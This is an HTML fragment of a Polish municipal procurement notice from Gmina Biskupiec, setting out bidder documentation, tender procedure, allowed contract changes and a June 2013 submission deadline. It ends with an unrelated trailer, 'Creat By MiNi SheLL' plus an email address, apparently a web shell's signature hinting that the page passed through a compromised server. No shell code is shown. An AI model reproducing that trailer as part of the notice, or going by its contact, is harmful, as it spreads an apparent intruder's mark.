</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy
Wszystkie dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W  przypadku przedstawienia kopii nieczytelnej lub budzącej wątpliwości co do jej prawdziwości zamawiający może żądać przedstawienia oryginału lub notarialnego potwierdzenia. W przypadku dokumentów lub oświadczeń sporządzonych w językach obcych należy dołączyć tłumaczenie na język polski  przez Wykonawcę.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów , na zasobach których wykonawca polega na zasadach określonych w art.26 ust.2b upzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
Złożone na wezwanie Zamawiającego oświadczenia i dokumenty muszą  potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez Zamawiającego , nie później niż w dniu , w którym upłynął termin składania ofert.
Zamawiający dopuszcza złożenie informacji, oświadczeń w innej formie, niż określone w SIWZ, jednakże muszą  zawierać wszystkie informacje , zgodnie z wymogami zamawiającego zawartymi w niniejszej SIWZ .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają istotne zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1). Wynagrodzenia w przypadku ustawowej zmiany stawki podatku od towarów i usług;
2) zmiany nazwy, siedziby lub innych danych Wykonawcy;
3) zmiany zabezpieczenia należytego wykonania umowy na wniosek Wykonawcy;
4)zmiany podwykonawców, pod warunkiem ich zaakceptowania przez Zamawiającego;
5)zmiany w zakresie sposobu realizacji umowy w przypadku zmiany przepisów prawa wpływających na sposób realizacji umowy , w tym zmiany przepisów prawa miejscowego ( np.regulaminu utrzymania czystości i porządku w gminie).
2. Zmiany w umowie mogą zostać dokonane wyłącznie w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugb@gminabiskupiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Biskupiec ul. Rynek 1 13-340 Biskupiec 
pokój nr 20 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2013 godzina 09:00, miejsce: Urząd Gminy Biskupiec ul. Rynek 1 13-340 Biskupiec 
pokój nr 11 I  piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com